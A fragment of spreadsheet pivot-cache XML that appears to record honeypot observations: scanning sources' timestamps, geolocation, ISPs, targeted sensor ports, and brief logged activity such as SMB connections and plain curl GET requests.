    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T20:24:10"/>
    <d v="2025-01-24T08:15:46"/>
    <d v="2025-04-14T20:24:10"/>
    <n v="75"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433&amp;&amp;53122&amp;&amp;445&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="KYT"/>
    <s v="Yau Tsim Mong"/>
    <s v="NA"/>
    <s v="Mong Kok"/>
    <s v="1819353"/>
    <s v="NA"/>
    <s v="22.3144"/>
    <s v="114.168"/>
    <s v="142032"/>
    <s v="High Family Technology Co., Limited"/>
    <s v="High Family Technology Co"/>
    <s v="business"/>
    <s v="High Family Technology Co., Limited"/>
    <s v="2020-03-22"/>
    <s v="HFTCL-HK"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,57082)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,57090)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,57978)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,57941)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,58001)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,59146)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,60947)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,61044)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,62070)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,62508)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,55242)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,55310)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,56402)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,52591)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,52600)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,53419)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,51694)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,51840)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,52802)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,50026)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,61571)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,61572)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,62421)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,55455)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,55457)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,56145)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,63503)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,63551)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,64689)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,57707)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,57798)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,58748)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,50311)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,50321)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,65022)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,65028)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,49588)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,50283)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,50285)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.201.70,51035)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6795:c946"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1777"/>
    <x v="1777"/>
    <s v="NA&amp;&amp;220-135-66-7.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-14T20:14:42"/>
    <d v="2023-07-24T15:21:29"/>
    <d v="2025-04-14T20:14:42"/>
    <n v="624460"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H47&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H30"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;22505&amp;&amp;23&amp;&amp;80&amp;&amp;NA&amp;&amp;9100&amp;&amp;40715"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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dc87:4207"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1778"/>
    <x v="1778"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T20:13:01"/>
    <d v="2024-07-10T01:52:00"/>
    <d v="2025-04-14T20:13:01"/>
    <n v="30"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;3306&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="NA"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VNPT"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="2010-08-16"/>
    <s v="VNPT-VN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:efc:81cc"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1779"/>
    <x v="1779"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T20:10:39"/>
    <d v="2023-07-28T04:05:32"/>
    <d v="2025-04-14T20:10:39"/>
    <n v="1250"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_MT-CPA_H24"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;37240&amp;&amp;23&amp;&amp;80&amp;&amp;55062&amp;&amp;53341&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taichung City"/>
    <s v="Taichung"/>
    <s v="1668399"/>
    <s v="NA"/>
    <s v="24.145"/>
    <s v="120.645"/>
    <s v="131596"/>
    <s v="TBC"/>
    <s v="TBC"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="TBCOM-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7b6e:cb9"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1780"/>
    <x v="1780"/>
    <s v="114-33-86-202.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T20:10:18"/>
    <d v="2023-07-28T02:04:42"/>
    <d v="2025-04-14T20:10:18"/>
    <n v="8409"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_TELNET_H20"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;35634&amp;&amp;80&amp;&amp;23&amp;&amp;26077&amp;&amp;32908&amp;&amp;30103&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GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7221:56ca"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1781"/>
    <x v="1781"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T20:04:42"/>
    <d v="2025-04-14T20:04:42"/>
    <d v="2025-04-14T20:04:42"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783c:fb8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1782"/>
    <x v="1782"/>
    <s v="59-126-156-132.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T19:59:01"/>
    <d v="2024-11-23T16:42:12"/>
    <d v="2025-04-14T19:59:01"/>
    <n v="283"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H17"/>
    <s v="80&amp;&amp;23&amp;&amp;25936&amp;&amp;56841&amp;&amp;9100&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GET&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7e:9c84"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1783"/>
    <x v="1783"/>
    <s v="59-126-203-187.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T19:58:23"/>
    <d v="2023-08-17T16:34:41"/>
    <d v="2025-04-14T19:58:23"/>
    <n v="782"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_SSH_H21&amp;&amp;SMA-LAB_HTTPS_H44&amp;&amp;SMA-LAB_HTTP_H37&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H39"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;22&amp;&amp;443&amp;&amp;80&amp;&amp;17338&amp;&amp;47910&amp;&amp;23&amp;&amp;9100&amp;&amp;11531&amp;&amp;50496&amp;&amp;NA"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7e:cbbb"/>
    <s v="C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1784"/>
    <x v="1784"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T19:55:54"/>
    <d v="2025-03-20T08:03:47"/>
    <d v="2025-04-14T19:55:54"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c7:c5e5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1785"/>
    <x v="1785"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T19:54:48"/>
    <d v="2025-04-14T19:52:40"/>
    <d v="2025-04-14T19:54:48"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NO"/>
    <s v="Norway"/>
    <s v="50"/>
    <s v="Trøndelag"/>
    <s v="Oppdal"/>
    <s v="Oppdal"/>
    <s v="3143513"/>
    <s v="7340"/>
    <s v="62.5942"/>
    <s v="9.691230000000001"/>
    <s v="52157"/>
    <s v="NEAS ENERGI TELEKOM AS"/>
    <s v="NEAS Energi Telekom Oppdalsregionen"/>
    <s v="residential"/>
    <s v="Vitnett Fiber"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
